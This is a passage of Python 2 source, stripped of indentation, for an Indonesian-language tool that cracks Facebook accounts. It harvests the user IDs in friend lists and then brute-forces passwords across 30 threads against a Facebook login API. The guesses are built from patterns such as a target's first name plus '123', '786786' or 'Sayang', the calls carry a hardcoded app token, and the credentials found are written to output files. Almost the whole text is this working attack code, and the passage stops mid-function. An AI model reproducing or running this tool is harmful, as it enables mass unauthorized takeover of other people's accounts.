print " \033[1;93m ××× \033[1;97mCRACK INDONESIA \033[1;93m×××"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idt = raw_input("\033[1;97m{\033[1;93m+\033[1;97m} ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;93m✓\033[1;97m} Nama : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;93m!\033[1;97m] ID publik/teman tidak ada !"
raw_input("\n[ Kembali ]")
indo()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idlist = raw_input('\033[1;97m{\033[1;93m?\033[1;97m} Nama File : ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m[!] File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m[!] File tidak ada !'
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
indo()
elif teak =="0" or teak =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
print "\033[1;97m{\033[1;93m+\033[1;97m} Total ID : "+str(len(id))
print('\033[1;97m{\033[1;93m?\033[1;97m} Stop CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;93m•\033[1;97m} Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
##### MAIN INDONESIA #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user.lower()+'/?access_token='+toket)
c = json.loads(a.text)
pass1 = c['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower().lower())+"&locale=en_US&password="+(pass1.lower())+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass1
oks.append(user.lower().lower()+pass1.lower())
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass1
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass1.lower()+"\n")
cek.close()
cekpoint.append(user.lower()+pass1.lower())
else:
pass2 = c['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass2.lower())+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass2.lower()
oks.append(user.lower()+pass2.lower())
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass2.lower()
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass2.lower()+"\n")
cek.close()
cekpoint.append(user.lower()+pass2.lower())
else:
pass3 = c['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass3.lower())+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass3.lower()
oks.append(user.lower()+pass3.lower())
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass3.lower()
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass3.lower()+"\n")
cek.close()
cekpoint.append(user.lower()+pass3.lower())
else:
pass4 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass4
oks.append(user.lower()+pass4)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass4
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user.lower()+pass4)
else:
pass5 = 'Anjing'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass5
oks.append(user.lower()+pass5)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass5
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user.lower()+pass5)
else:
pass6 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass6
oks.append(user.lower()+pass6)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass6
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user.lower()+pass6)
else:
pass7 = 'Kontol'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass7
oks.append(user.lower()+pass7)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass7
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass7+"\n")
cek.close()
cekpoint.append(user.lower()+pass7)
else:
pass8 = 'Cantik'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass8
oks.append(user.lower()+pass8)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass8
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass8+"\n")
cek.close()
cekpoint.append(user.lower()+pass8)
else:
pass9 = c['first_name']+'321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + pass9
oks.append(user.lower()+pass9)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m[Cekpoint] ' + user.lower() + ' ❂ ' + pass9
cek = open("out/ind1.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +pass9+"\n")
cek.close()
cekpoint.append(user.lower()+pass9)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print '\033[1;97m[\033[1;93m✓\033[1;97m] \033[1;97mSelesai ....'
print"\033[1;97m[\033[1;93m+\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;93mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print '\033[1;97m[\033[1;93m!\033[1;97m] \033[1;97mCP file tersimpan : out/ind1.txt'
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[\033[1;97m Kembali \033[1;93m]")
os.system("python2 vip.py")
########## CRACK BANGLADESH #######
def bangla():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;94m01\033[1;97m]\033[1;96m->\033[1;97m Crack dari daftar teman"
print "\033[1;97m[\033[1;94m02\033[1;97m]\033[1;96m->\033[1;97m Crack dari id publik/teman"
print "\033[1;97m[\033[1;94m03\033[1;97m]\033[1;96m->\033[1;97m Crack dari file"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih_bangla()
#### PILIH BANGLA ####
def pilih_bangla():
reak = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if reak =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_bangla()
elif reak =="1" or reak == "01":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif reak =="2" or reak == "02":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print " \033[1;94m ××× \033[1;97mCRACK BANGLADESH/PAKISTAN \033[1;94m××× "
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
dok = raw_input("\033[1;97m{\033[1;94m+\033[1;97m} ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+dok+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;94m✓\033[1;97m} Nama : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;94m!\033[1;97m] ID publik/teman tidak ada !"
raw_input("\n[ Kembali ]")
bangla()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+dok+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif reak =="3" or reak == "03":
os.system('clear')
print logo
try:
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idlist = raw_input('\033[1;97m{\033[1;94m?\033[1;97m} Nama File : ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m[!] File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m[!] File tidak ada !'
raw_input('\n\033[1;93m[ \033[1;97mKembali \033[1;93m]')
bangla()
elif reak =="0" or reak == "00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_bangla()
print "\033[1;97m{\033[1;94m+\033[1;97m} Total ID : "+str(len(id))
print('\033[1;97m{\033[1;94m?\033[1;97m} Stop CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;94m•\033[1;97m} Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
#####MAIN_BANGLADESH#####
def main(arg):
global cpe,oke
ubd = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+ubd+'/?access_token='+toket)
x = json.loads(a.text)
bos1 = x['first_name']+'123'
data1 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga1 = json.load(data1)
if 'access_token' in naga1:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos1
oke.append(ubd+bos1)
else:
if 'www.facebook.com' in naga1['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos1
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos1+"\n")
cek.close()
cpe.append(ubd+bos1)
else:
bos2 = x['first_name']+'1234'
data2 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga2 = json.load(data2)
if 'access_token' in naga2:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos2
oke.append(ubd+bos2)
else:
if 'www.facebook.com' in naga2['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos2
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos2+"\n")
cek.close()
cpe.append(ubd+bos2)
else:
bos3 = x['first_name']+'12345'
data3 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga3 = json.load(data3)
if 'access_token' in naga3:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos3
oke.append(ubd+bos3)
else:
if 'www.facebook.com' in naga3['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos3
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos3+"\n")
cek.close()
cpe.append(ubd+bos3)
else:
bos4 = '786786'
data4 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga4 = json.load(data4)
if 'access_token' in naga4:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos4
oke.append(ubd+bos4)
else:
if 'www.facebook.com' in naga4['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos4
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos4+"\n")
cek.close()
cpe.append(ubd+bos4)
else:
bos5 = x['first_name']+'786'
data5 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga5 = json.load(data5)
if 'access_token' in naga5:
print '\033[1;92m[Berhasil] '+ubd+' ❂ '+bos5
oke.append(ubd+bos5)
else:
if 'www.facebook.com' in naga5['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos5
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos5+"\n")
cek.close()
cpe.append(ubd+bos5)
else:
bos6 = x['last_name']+'123'
data6 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga6 = json.load(data6)
if 'access_token' in naga6:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos6
oke.append(ubd+bos6)
else:
if 'www.facebook.com' in naga6['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos6
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos6+"\n")
cek.close()
cpe.append(ubd+bos6)
else:
bos7 = x['last_name']+'1234'
data7 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga7 = json.load(data7)
if 'access_token' in naga7:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos7
oke.append(ubd+bos7)
else:
if 'www.facebook.com' in naga7['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ '+bos7
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos7+"\n")
cek.close()
cpe.append(ubd+bos7)
else:
bos8 = 'Pakistan'
data8 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga8 = json.load(data8)
if 'access_token' in naga8:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos8
oke.append(ubd+bos8)
else:
if 'www.facebook.com' in naga8['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ ' +bos8
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos8+"\n")
cek.close()
cpe.append(ubd+bos8)
else:
bos9 = x['last_name']+'786'
data9 = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(ubd)+"&locale=en_US&password="+(bos9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
naga9 = json.load(data9)
if 'access_token' in naga9:
print '\033[1;92m[Berhasil] ' +ubd+' ❂ '+bos9
oke.append(ubd+bos9)
else:
if 'www.facebook.com' in naga9['error_msg']:
print '\033[1;94m[Cekpoint] ' +ubd+' ❂ ' +bos9
cek = open("out/pakisbang.txt", "a")
cek.write("ID:" +ubd+ " Pw:" +bos9+"\n")
cek.close()
cpe.append(ubd+bos9)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print '\033[1;97m[\033[1;94m✓\033[1;97m] \033[1;97mSelesai ....'
print"\033[1;97m[\033[1;94m+\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;94mCP \033[1;97m: \033[1;92m"+str(len(oke))+"\033[1;97m/\033[1;94m"+str(len(cpe))
print '\033[1;97m[\033[1;94m!\033[1;97m] \033[1;97mCP file tersimpan : out/pakisbang.txt'
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[\033[1;97m Kembali \033[1;93m]")
os.system("python2 vip.py")
##########CRACK SANDI#######
def sandi():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;96m01\033[1;97m]\033[1;96m->\033[1;97m Crack dari daftar teman"
print "\033[1;97m[\033[1;96m02\033[1;97m]\033[1;96m->\033[1;97m Crack dari id publik/teman"
print "\033[1;97m[\033[1;96m03\033[1;97m]\033[1;96m->\033[1;97m Crack dari file"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
pilih_sandi()
def pilih_sandi():
weak = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if weak =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_sandi()
elif weak =="1" or weak =="01":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;93m ××× \033[1;97mBUAT LIST PASSWORD\033[1;93m ×××"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 1 : NamaDepan123 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 2 : NamaDepan1234 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 3 : NamaDepan12345 ")
sandi4 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 4 : ")
sandi5 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 5 : ")
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif weak =="2" or weak =="02":
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;93m ××× \033[1;97mBUAT LIST PASSWORD\033[1;93m ×××"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 1 : NamaDepan123 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 2 : NamaDepan1234 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 3 : NamaDepan12345 ")
sandi4 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 4 : ")
sandi5 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 5 : ")
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idt = raw_input("\033[1;97m{\033[1;96m+\033[1;97m} ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;96m✓\033[1;97m} Nama : "+op["name"]
except KeyError:
print"[!] ID publik tidak ditemukan!"
raw_input("\n[ Kembali ]")
sandi()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif weak =="3" or weak =="03":
os.system('clear')
print logo
try:
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;93m ××× \033[1;97mBUAT LIST PASSWORD\033[1;93m ×××"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 1 : NamaDepan123 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 2 : NamaDepan1234 ")
print ("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 3 : NamaDepan12345 ")
sandi4 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 4 : ")
sandi5 = raw_input("\033[1;97m{\033[1;96m?\033[1;97m} Sandi 5 : ")
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idlist = raw_input('\033[1;97m{\033[1;96m?\033[1;97m} Nama File : ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;91m[!] File tidak ada'
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
sandi()
except IOError:
print '\033[1;91m[!] File tidak ada'
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
sandi()
elif weak =="0" or weak =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
print "\033[1;97m{\033[1;96m+\033[1;97m} Total ID : "+str(len(id))
print('\033[1;97m{\033[1;96m?\033[1;97m} Stop CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;96m•\033[1;97m} Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
#####CRACK SANDI#####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user.lower()+'/?access_token='+toket)
c = json.loads(a.text)
sandi1 = c['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi1
oks.append(user.lower()+sandi1)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi1
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi1+"\n")
cek.close()
cekpoint.append(user.lower()+sandi1)
else:
sandi2 = c['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi2
oks.append(user.lower()+sandi2)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi2
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi2+"\n")
cek.close()
cekpoint.append(user.lower()+sandi2)
else:
sandi3 = c['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi3
oks.append(user.lower()+sandi3)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;91m[Cekpoint] ' + user.lower() + ' ❂ ' + sandi3
cek = open("out/world.txt", "a")
cek.write("ID:" +user.lower()+ " Pw:" +sandi3+"\n")
cek.close()
cekpoint.append(user.lower()+sandi3)
else:
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user.lower())+"&locale=en_US&password="+(sandi4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m[Berhasil] ' + user.lower() + ' ❂ ' + sandi4
